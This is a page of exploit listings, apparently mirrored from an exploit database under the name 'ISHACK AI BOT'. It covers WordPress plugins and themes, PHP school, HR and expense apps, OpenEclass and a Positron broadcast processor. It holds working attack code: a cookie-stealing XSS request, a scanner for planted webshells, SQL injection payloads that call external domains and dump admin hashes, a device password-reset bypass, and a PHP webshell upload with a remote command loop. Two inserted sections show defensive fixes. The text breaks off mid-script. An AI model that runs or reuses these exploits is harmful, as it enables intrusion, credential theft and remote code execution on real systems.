All posts by ISHACK AI BOT
-
Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.3.1

# Proof Of Concept:
1. Click Add New Watermark and enter the XSS payload into the Watermark Text.
2. Stored XSS will run on anyone who wants to edit this page.

# Vulnerable Property: watermark_title
# PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp

# Request:
POST /wp-admin/post.php HTTP/2
Host: erdemstar.local
Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723
Content-Length: 1460
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px
-
Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init

init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
urllib3.disable_warnings()

headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
}


def URLdomain(url):
    # Strip the scheme and any path so only the host part remains
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url


def check_security(url):
    fg = success_color
    fr = error_color
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))

        check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15)
            if 'Yanz Webshell!' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('wso.txt', 'a').write(url + '/about.php\n')
            else:
                url = 'https://' + URLdomain(url)
                check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15)
                if '#0x2525' in check.text:
                    print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                    open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n')
                else:
                    print(' -| ' + url + ' --> {}[Failed]'.format(fr))

        url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))

        url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        print(f' -| {url} --> {fr}[Failed] due to: {e}')


def main():
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ")

    if not os.path.isfile(url_file_path):
        print(f"{error_color}[ERROR] The specified file path is invalid.")
        sys.exit(1)

    try:
        urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the file: {e}")
        sys.exit(1)

    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.")


if __name__ == "__main__":
    main()
-
Best Student Result Management System v1.0 - Multiple SQLi
## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:

```mysql
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```
-
Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
# Author: LiquidWorm
# Vendor: Positron srl
# Product web page: https://www.positron.it
#                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
# Affected version: 1.20
#                   TRA7K5_REV107
#                   TRA7K5_REV106
#                   TRA7K5_REV104
#                   TRA7K5_REV102
#
# Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
# guarantee an excellent quality-price ratio in compliance with current regulations and
# intended for individual broadcasters or radio networks. All models in the TRA7000 series
# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
# for both analogue and digital audio inputs, change-over emergency switching between any
# input with adjustable thresholds and intervention times, both in the switching phase on
# the secondary source and in the return phase to the primary source. Ethernet connection
# with Web-Server (optional) for total control and management of the device. Advanced BYPASS
# system between MPX input and outputs, active on operating and power supply anomalies and
# can also be activated remotely.
#
# Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
# bypass through a direct and unauthorized access to the password management functionality.
# The vulnerability allows attackers to bypass Digest authentication by manipulating the
# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
# value or remove it entirely. This grants unauthorized access to protected areas (/user,
# /operator, /admin) of the application without requiring valid credentials, compromising
# the device's system security.
#
# Tested on: Positron Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5813
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
#
#
# 22.03.2024
#
#

import requests, sys

print("""
______________________________________
┏┳┓• ┏┓ ┓ ┏┓ ┓ •
┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋
┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗
      ┛              ┛
 for Positron Digital Signal Processor
              ZSL-2024-5813
______________________________________
""")

if len(sys.argv) != 4:
    print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
    sys.exit(1)

ip = sys.argv[1]
ut = sys.argv[2]
wa = sys.argv[3]

valid_ut = ['user', 'oper', 'admin']
if ut.lower() not in valid_ut:
    print("Invalid user type! Use 'user', 'oper', or 'admin'.")
    sys.exit(1)

url = f'http://{ip}/_Passwd.html'
did = f'http://{ip}/_Device.html'

# Fingerprint the device page before touching the password endpoint
try:
    r = requests.get(did)
    if r.status_code == 200 and 'TRA7K5' in r.text:
        print("Vulnerable processor found!")
    else:
        print("Not Vulnerable or not applicable. Exploit exiting.")
        sys.exit(1)
except requests.exceptions.RequestException as e:
    print(f"Error checking device: {e}")
    sys.exit(1)

headers = {
    'Content-Type'   : 'application/x-www-form-urlencoded',
    'Accept-Language': 'mk-MK,en;q=0.6',
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent'     : 'R-Marina/11.9',
    'Accept'         : '*/*'
}

# PSW_User / PSW_Oper / PSW_Admin: 'NONE' removes the password, anything else sets it
payload = {}
if wa.lower() == 'erase':
    payload[f'PSW_{ut.capitalize()}'] = 'NONE'
else:
    payload_key = f'PSW_{ut.capitalize()}'
    payload[payload_key] = wa

#print(payload)

r = requests.post(url, headers=headers, data=payload)
print(r.status_code)
print(r.text)
-
Human Resource Management System v1.0 - Multiple SQLi
## Title: Human Resource Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/02/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:

```mysql
---
Parameter: cityedit (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+'' ELSE 0x28 END)) AND 'GMzs'='GMzs

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) AND 'Jtnd'='Jtnd
---
```
-
Daily Expense Manager 1.0 - 'term' SQLi
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74

## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.

## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd

## Vulnerable HTTP parameter:
term (GET)

## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-

## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23

<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.

//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
}

//return json data
echo json_encode($data);
?>
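The readxp.php query above, and the sqlmap output in the two nu11secur1ty advisories on this page, all come down to the same defect: a request parameter spliced into the SQL text. The following is an added example (not code from any of these advisories or vendors) that rebuilds the readxp.php query against an in-memory SQLite database, runs the advisory's UNION payload through it, and shows the bound-parameter form that closes the hole. The table contents are constructed sample data; `@@version` is swapped for SQLite's `sqlite_version()` and the UNION is trimmed to three columns to match the sample table.

```python
import sqlite3

# Constructed sample data standing in for the MySQL `expense` table that
# readxp.php queries; column names come from the advisory's query.
EXPENSE_ROWS = [
    # (pname, uid, isdel)
    ("asdf rent", "1", "0"),
    ("asdf food", "1", "0"),
    ("asdf food", "1", "0"),    # duplicate, collapsed by GROUP BY
    ("secret bonus", "2", "0"), # another user's row, hidden by uid filter
    ("asdf old", "1", "1"),     # soft-deleted, hidden by isdel='0'
]
USER_ROWS = [("1", "alice", "hash-a"), ("2", "bob", "hash-b")]

# The advisory's payload (asd' UNION ALL SELECT 1,@@version,3,4,5,6-- -),
# adapted to SQLite and to a three-column table so the UNION lines up.
PAYLOAD = "asd' UNION ALL SELECT username, password, sqlite_version() FROM users-- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE expense (pname TEXT, uid TEXT, isdel TEXT)")
    conn.executemany("INSERT INTO expense VALUES (?, ?, ?)", EXPENSE_ROWS)
    conn.execute("CREATE TABLE users (uid TEXT, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USER_ROWS)
    return conn


def search_vulnerable(conn, term, sid):
    """Mirrors readxp.php: $_GET['term'] is pasted into the SQL text, so a
    quote in it closes the LIKE literal and the remainder runs as SQL. The
    uid/isdel filters after the injection point are commented away too."""
    sql = (f"SELECT * FROM expense WHERE pname like '%{term}%' "
           f"AND uid='{sid}' and isdel='0' group by pname")
    return [tuple(r) for r in conn.execute(sql)]


def search_hardened(conn, term, sid):
    """Same query with bound parameters: the term is data, never SQL, and the
    wildcard wrapping is done in Python rather than inside the query text."""
    sql = ("SELECT * FROM expense WHERE pname like ? "
           "AND uid=? and isdel='0' group by pname")
    return [tuple(r) for r in conn.execute(sql, (f"%{term}%", sid))]


if __name__ == "__main__":
    db = make_db()
    print("normal:  ", search_vulnerable(db, "asd", "1"))
    print("injected:", search_vulnerable(db, PAYLOAD, "1"))
    print("hardened:", search_hardened(db, PAYLOAD, "1"))
```

The injected call returns the `users` rows (including another user's password hash) while the hardened call returns nothing for the same input, because the payload is only ever compared against `pname` as a literal pattern.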
-
GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload
# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload
# Date: 2024-02-04
# Exploit Author: Georgios Tsimpidas
# Vendor Homepage: https://www.openeclass.org/
# Software Link: https://download.openeclass.org/files/3.15/
# Version: 3.15 (2024)
# Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1)
# CVE : CVE-2024-31777
# GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File

import requests
import argparse
import zipfile
import os
import sys

RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'

# PHP web shell that is zipped and uploaded as a certificate template
MALICIOUS_PAYLOAD = """\
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>
"""


def banner():
    print(f'''{RED}
{YELLOW}
============================
      Author: Frey
============================
{RESET}''')


def execute_command(openeclass, filename):
    while True:
        # Prompt for user input with "eclass"
        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")

        # Check if the command is 'quit', then break the loop
        if cmd.lower() == "quit":
            print(f"{ORANGE}\nExiting...{RESET}")
            clean_server(openeclass)
            sys.exit()

        # Construct the URL with the user-provided command
        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"

        # Execute the GET request
        try:
            response = requests.get(url)
            # Check if the request was successful
            if response.status_code == 200:
                # Print the response text
                print(f"{GREEN}{response.text}{RESET}")
        except requests.exceptions.RequestException as e:
            # Print any error that occurs during the request
            print(f"{RED}An error occurred: {e}{RESET}")


def upload_web_shell(openeclass, username, password):
    login_url = f'{openeclass}/?login_page=1'
    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'

    # Login credentials
    payload = {
        'next': '/main/portfolio.php',
        'uname': f'{username}',
        'pass': f'{password}',
        'submit': 'Enter'
    }
    headers = {
        'Referer': login_page_url,
    }

    # Use a session to ensure cookies are handled correctly
    with requests.Session() as session:
        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
        session.get(login_page_url)

        # Post the login credentials
        response = session.post(login_url, headers=headers, data=payload)

        # Create a zip file containing the malicious payload
        zip_file_path = 'malicious_payload.zip'
        with zipfile.ZipFile(zip_file_path, 'w') as zipf:
            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())

        # Upload the zip file; the handle is closed before the file is removed
        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'
        with open(zip_file_path, 'rb') as zip_fh:
            files = {
                'filename': ('evil.zip', zip_fh, 'application/zip'),
                'certhtmlfile': (None, ''),
                'orientation': (None, 'L'),
                'description': (None, ''),
                'cert_id': (None, ''),
                'submit_cert_template': (None, '')
            }
            response = session.post(url, files=files)

        # Clean up the zip file
        os.remove(zip_file_path)

        # Check if the upload was successful
        if response.status_code == 200:
            print(f"{GREEN}Payload uploaded successfully!{RESET}")
            return True
        else:
            print(f"{RED}Failed to upload payload. Exiting...{RESET}")
            return False


def clean_server(openeclass):
    print(f"{ORANGE}Cleaning server...{RESET}")
    # Remove the uploaded files
    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")
    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")
    print(f"{GREEN}Server cleaned successfully!{RESET}")


def main():
    parser = argparse.ArgumentParser(description="Open eClass – CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")
    parser.add_argument('-u', '--username', required=True, help="Username for login")
    parser.add_argument('-p', '--password', required=True, help="Password for login")
    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
    args = parser.parse_args()

    banner()

    # Running the main login and execute command function
    if upload_web_shell(args.eclass, args.username, args.password):
        execute_command(args.eclass, 'evil.php')


if __name__ == "__main__":
    main()
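The exploit above works because the zip handed to certbadge.php is unpacked into a web-served directory with no check on what it contains. The following is an added example (not OpenEclass code and not the advisory author's) of the inspection a template importer should do on an uploaded archive before extracting anything: reject server-side extensions anywhere in a member name (evil.php, evil.php.png, .htaccess), reject paths that escape the target directory, reject symlink members, and cap member count and uncompressed size. The extension allowlist and size limits are assumptions for this example; the sample archives, including the advisory's evil.php bundle, are constructed in memory.

```python
import io
import posixpath
import zipfile

# Hypothetical policy for a certificate-template bundle (assumed here, not
# OpenEclass's own rules): only static template assets may be unpacked.
ALLOWED_EXT = {".html", ".htm", ".css", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".ttf"}
SERVER_SIDE_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".htaccess"}
MAX_MEMBERS = 200
MAX_TOTAL_BYTES = 10 * 1024 * 1024


class UnsafeArchive(ValueError):
    """Raised for any member that must not reach the web root."""


def validate_template_zip(data: bytes) -> list[str]:
    """Inspect every member before anything is extracted. Returns the
    normalised member names on success, raises UnsafeArchive otherwise."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        raise UnsafeArchive(f"not a zip file: {exc}") from None
    infos = zf.infolist()
    if len(infos) > MAX_MEMBERS:
        raise UnsafeArchive(f"too many members ({len(infos)})")
    total, names = 0, []
    for info in infos:
        raw = info.filename
        norm = posixpath.normpath(raw.replace("\\", "/"))
        # Absolute paths, drive letters and leading ".." escape the target dir.
        if raw.startswith(("/", "\\")) or norm == ".." or norm.startswith("../") \
                or ":" in norm.split("/")[0]:
            raise UnsafeArchive(f"path escapes target dir: {raw!r}")
        # The Unix mode lives in the high 16 bits of external_attr; 0o120000 is a symlink.
        if (info.external_attr >> 16) & 0o170000 == 0o120000:
            raise UnsafeArchive(f"symlink member: {raw!r}")
        if info.is_dir():
            continue
        base = posixpath.basename(norm).lower()
        suffixes = ["." + part for part in base.split(".")[1:]]
        # A server-side suffix anywhere in the name is rejected (covers evil.php,
        # evil.php.png under AddHandler-style configs, and .htaccess); the final
        # suffix must then be on the allowlist.
        if any(s in SERVER_SIDE_EXT for s in suffixes):
            raise UnsafeArchive(f"server-side file: {raw!r}")
        if not suffixes or suffixes[-1] not in ALLOWED_EXT:
            raise UnsafeArchive(f"extension not allowed: {raw!r}")
        total += info.file_size
        if total > MAX_TOTAL_BYTES:
            raise UnsafeArchive("uncompressed size exceeds limit")
        names.append(norm)
    return names


def check_template_zip(data: bytes):
    """Convenience wrapper: (True, member names) or (False, reason)."""
    try:
        return True, validate_template_zip(data)
    except UnsafeArchive as exc:
        return False, str(exc)


def build_zip(members, symlink=None) -> bytes:
    """Build a test archive in memory. `members` maps name -> bytes;
    `symlink` optionally adds a (name, target) symlink entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
        if symlink:
            name, target = symlink
            zi = zipfile.ZipInfo(name)
            zi.external_attr = 0o120777 << 16   # lrwxrwxrwx
            zf.writestr(zi, target)
    return buf.getvalue()


# Constructed samples: the advisory's evil.php bundle and a few variants.
EVIL_ZIP = build_zip({"evil.php": b"<?php system($_REQUEST['cmd']); ?>"})
DOUBLE_EXT_ZIP = build_zip({"evil.php.png": b"<?php system($_REQUEST['cmd']); ?>"})
TRAVERSAL_ZIP = build_zip({"../../modules/admin/x.html": b"<h1>x</h1>"})
SYMLINK_ZIP = build_zip({}, symlink=("cert.html", "/etc/passwd"))
GOOD_ZIP = build_zip({"cert.html": b"<html></html>", "img/logo.png": b"\x89PNG"})

if __name__ == "__main__":
    for label, blob in [("evil", EVIL_ZIP), ("double-ext", DOUBLE_EXT_ZIP),
                        ("traversal", TRAVERSAL_ZIP), ("symlink", SYMLINK_ZIP),
                        ("good", GOOD_ZIP)]:
        print(label, check_template_zip(blob))
```

Validation alone is not the whole fix: the extracted files should also land outside the document root, or in a directory where the web server has script execution disabled, so that a bypass of the name check still does not yield code execution.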
-
Open Source Medicine Ordering System v1.0 - SQLi
'''
# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi
# Author : Onur Karasalihoğlu
# Date : 27/02/2024

# Sample Usage
% python3 omos_sqli_exploit.py https://target.com
Available Databases:
1. information_schema
2. omosdb
Please select a database to use (enter number): 2
You selected: omosdb
Extracted Admin Users Data:
1 | Adminstrator | Admin |  | 0192023a7bbd73250516f069df18b500 | admin
2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith
'''

import requests
import re
import sys


def fetch_database_names(domain):
    # UNION-based injection in the `date` parameter of the admin reports page;
    # the schema list is wrapped in 'enforsec' markers so it can be picked out of the HTML
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests

        # data extraction
        pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            databases = extracted_data.group(1).split(',')
            databases = [db.replace('"', '') for db in databases]
            print("Available Databases:")
            for i, db in enumerate(databases, start=1):
                print(f"{i}. {db}")

            # users should select omos database
            choice = int(input("Please select a database to use (enter number): "))
            if 0 < choice <= len(databases):
                selected_db = databases[choice - 1]
                print(f"You selected: {selected_db}")
                fetch_data(domain, selected_db)
            else:
                print("Invalid selection.")
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")


def fetch_data(domain, database_name):
